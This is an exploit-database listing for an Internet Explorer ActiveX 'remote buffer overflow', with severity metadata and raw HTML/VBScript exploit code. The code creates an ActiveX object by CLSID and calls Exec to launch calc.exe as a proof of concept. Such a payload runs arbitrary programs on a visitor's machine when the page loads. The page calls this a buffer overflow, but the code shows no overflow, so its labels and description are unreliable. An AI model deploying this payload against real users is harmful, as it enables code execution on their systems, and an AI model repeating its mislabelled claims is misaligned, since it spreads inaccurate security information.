IE ActiveX remote bof (remote code excution)

vendor:

Internet Explorer

by:

germaya_x & D3V!L FUCKER

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Internet Explorer

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7, Windows Vista, Windows XP SP2

2020

IE ActiveX remote bof (remote code excution)

This exploit uses a buffer overflow vulnerability in Internet Explorer's ActiveX control to execute arbitrary code. The exploit code is written in VBScript and uses the 'target.Exec' command to execute a program of the attacker's choice. In this case, the program is 'calc.exe' which is located in the Windows system32 directory.

Mitigation:

Disable ActiveX controls in Internet Explorer, or use a different web browser.

Source

Exploit-DB raw data:

#######################################################################
#IE ActiveX remote bof (remote code excution)
#version: all versions
#Author:    [germaya_x & D3V!L FUCKER]
#special thanx: [for my best friend his0k4].
#Geetz [2] :[Sarbot511 ,thrid-devil].
#tested on : windows 7 , windows vista ,windows xp sp2
#######################################################################
<html>
<p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
<script language='vbscript'>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1 

</script></p>